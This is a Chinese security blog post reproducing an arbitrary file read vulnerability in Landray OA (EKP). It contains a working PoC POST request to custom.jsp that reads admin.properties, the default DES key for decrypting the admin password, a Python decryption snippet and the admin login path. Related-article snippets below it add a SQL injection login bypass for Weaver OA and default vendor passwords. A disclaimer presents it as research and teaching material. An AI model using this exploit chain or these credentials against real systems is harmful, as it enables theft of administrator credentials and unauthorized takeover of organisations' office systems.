X凌OA系统任意文件读取-DES解密

最新推荐文章于 2025-04-29 17:12:59 发布
最新推荐文章于 2025-04-29 17:12:59 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 网络安全 漏洞复现 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37602797/article/details/116764324
版权

图片

X凌OA系统任意文件读取-DES解密

一、漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息

二、漏洞影响

蓝凌OA

三、

利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件

读取路径:

/WEB-INF/KmssConfig/admin.properties

读取文件:

图片

POC:

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

获取密码DES解密登陆后台:默认密钥为 kmssAdminKey

图片

访问后台登台:

http://127.0.0.1/admin.do

图片

成功登陆后台:

图片

编写POC脚本验证:

图片

还需要自己去验证解密:

编写本地DES解密:

def decrypt_str(s):
 k = des(Des_Key, ECB, Des_IV, pad=None, padmode=PAD_PKCS5)
 decrystr = k.decrypt(base64.b64decode(s))
 print(decrystr)
 return decrypt_str

图片

发现key字符过长:

ValueError: Invalid DES key size. Key must be exactly 8 bytes long.

密钥长了,查了一下下 需要前面8位就OK 也能解开

图片

直接解密明文:

图片

参考:

https://github.com/Cr4y0nXX/LandrayReadAnyFile

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

图片

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人优快云:https://blog.youkuaiyun.com/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

语雀博客主页:https://www.yuque.com/thelostworld

图片

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

图片

蓝凌OA custom.jsp 任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
04-06 583
蓝凌OA custom.jsp 任意文件读取漏洞(含批量验证poc)
「JS逆向三百例」js逆向致远OA的前端密码加密逆向分析
布啦啦
03-17 854
本文详细分析了致远OA系统前端登录过程中密码的加密机制,通过逆向工程解析了其 JavaScript 加密逻辑,重点研究了 CryptoJS 库的使用以及 DES 加密算法的实现。基于逆向分析结果,使用 Python 模拟了致远OA的登录流程,包括密钥派生、密码加密和请求构造,最终实现了自动化登录功能。本文旨在为安全研究人员提供技术参考,帮助理解前端加密机制,并强调技术研究的合法性和合规性。
蓝凌OA custom.jsp 任意文件读取漏洞批量扫描脚本.py
08-28
自己写的批量扫描脚本,很好用,可以借鉴一下
蓝凌OA任意文件读取漏洞利用思路之任意用户登陆实现
最新发布
Pumpk1n_的博客
04-29 1867
本文会对蓝凌OA WebService任意文件读取漏洞行复现以及在该漏洞存在的情况下可能导致的任意用户登陆。
蓝凌OA前台任意文件读取漏洞利用
08-05 2166
近期CNVD爆出漏洞编号:CNVD-2021-28277,首次公开日期为2021-04-15,蓝凌oa存在多个漏洞,攻击者可利用该漏洞获取服务器控制权。今天挑选一个蓝凌OA前台任意文件读取漏洞进行分析使用。链接:https://www.cnvd.org.cn/flaw/show/CNVD-2021-28277 蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服
蓝凌(Landray)OA漏洞常见RCE
qq_53385700的博客
01-12 1万+
蓝凌OA常见RCE的poc
【代码审计】任意文件读取漏洞实例
04-15 483
0x00 前言   大多数网站都提供读取文件功能,一般实现过程是,根据参数filename的值,获得该文件在网站上的绝对路径,读取文件。   这里,通过两个任意文件读取漏洞实例去展示漏洞原理、漏洞危害。 0x01 漏洞实例一 环境搭建: XYHCMS官网:http://www.xyhcms.com/ 网站源码版本:XYHCMS V3.5(2017-12-04 更新) 程序源...
软件漏洞-泛微OA-汇总
weixin_30855099的博客
09-20 3440
SQL注入 前台SQL注入 用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a 密码: 1 验证页面参数 -loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.js...
深入解析泛微OA e-cology 8:掌握WebService接口核心功能及安全策略
![深入解析泛微OA e-cology 8:掌握WebService接口核心功能及安全策略](https://img-blog.csdnimg.cn/6849a6c552cf4b94bbb036eaf0183ad1.png) ...## 1.1 系统简介 泛微OA e-cology 8 是泛微网络科技股份有
C#文件中转站构建策略:从需求分析到系统设计的完整路径
本文旨在对C#文件中转站进行系统的需求分析、设计、实现技术探讨及实践应用评估。首先,本文分析了C#文件中转站的基本需求,探讨了满足这些需求的设计原则和方法。在系统设计方面,本文深入研究了面向对象设计原则和...
软考- 高级信息系统项目管理师,第一章 信息化与信息系统
苛学加记事
05-10 7587
第一章 信息化与信息系统 1. 信息系统与信息化 1.1 信息的基本概念 1.1.1 什么是信息 香农指出,信息就是能够用来消除不确定性的东西。 1.1.2 信息质量属性 ① 精确性:对事物状态描述的精准程度。 ② 完整性:对事物状态描述的全面程度,完整信息包括所有重要事实。 ③ 可靠性:值信息的来源、采集方法、传输过程是可以信任的,符合预期的。 ④ 及时性:指获取信息的时刻与事件发生时刻的间隔长短。 ⑤ 经济性:指信息获取、传输带来的成本可以在接受的范围内。 ⑥ 可验证性:指信息的主要质量属性可以被证
蓝凌OA custom命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-18 729
蓝凌OA custom命令执行漏洞(含批量验证poc)
【复现】蓝凌OA 信息泄露漏洞_35
fushuang333的博客
01-31 1305
【复现】蓝凌OA 信息泄露漏洞,蓝凌智能OA是由深圳市蓝凌软件股份有限公司开发,是一款针对中小企业的移动化智能办公产品,
蓝凌OA系统任意文件读取
maverickpig的博客
05-26 3741
网络安全自学日志-漏洞复现篇:蓝凌OA系统任意文件读取&SSRF+JNDI远程命令执行组合 工作中遇到的漏洞,文章为自己复现做的相关笔记,参考了很多前人的资料,只是做个笔记。 标题一、漏洞描述 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,同时可利用ssrf进行远程命令执行。 标题二、漏洞影响 蓝凌OA 标题三、任意文件读取复现 利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件 读取路径: /WEB-INF/KmssConfig/
各大OA调试账户默认账户口令
weixin_43304436的博客
06-21 1435
1、今目标地址:http://web.jingoal.com/mgt/用户名:admin@8216261密码:1a2s3d4f5g2、IBOS博思协同地址:http://demo.ibos.com.cn/?r=user/default/login页面默认可登录3、Soffice赛飞OA地址:http://oa.isoffice.cn/页面默认可登录4、企明岛地址:https://pass...
蓝凌OA漏洞复现
热门推荐
混子
12-13 2万+
又是学习漏洞的一天,老是能听到蓝凌OA爆发了什么,我就很蒙蔽,想问问旁边师傅,蓝凌是个什么,又怕师傅来句你连蓝凌都不知道,怪尴尬,索性还是靠自己把,今天复现蓝凌OA
空欢喜的众测之旅
白帽子凯哥聊黑客
07-21 205
2、使用网上的poc读取管理员密码配置文件得到加密的管理员密码,发现未成功//参考链接:http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20SSRF+JNDI%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.html>//vps上下载相关工具。一个shell nk。
蓝凌OA 蓝凌EKP JAVA产品开发规范 蓝凌二次开发资料
oSenLin123456的博客
06-30 2489
开发人员编写程序的过程中,每个程序都会有很多不同的版本,这就需要开发人员很好的管理代码,在需要的时间可以取出需要的版本,并且每个版本都需要一个完成的说明和标记。在处理过程的每个阶段都有相关注释说明,特殊变量(结构、联合、类或对象)定义或引用时,也应写注释,有注释有便于其他开发人员或自己下次查看代码时候能很明白程序的意思,读懂程序,可以减少内部的沟通。开发人员在编程过程代码目录结构、业务逻辑在什么地方、配置文件存放位置等都需要规范,以便其他开发人员快速查找文件,减少开发过程中的沟通,减少维护成本。
四千多个厂商默认帐号、默认密码
07-30 2万+
防止被黑客利用,请自查,尽快更改默认密码!!! 设备 默认账号 默认密码 致远OA sangfor admin1 audit-admin group-admin system 123456 123456 123456 泛微OA sysadmin 1 Minio minioadmin Minioadmin 海康威视 Admin 12345. 天地伟业 Admin
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值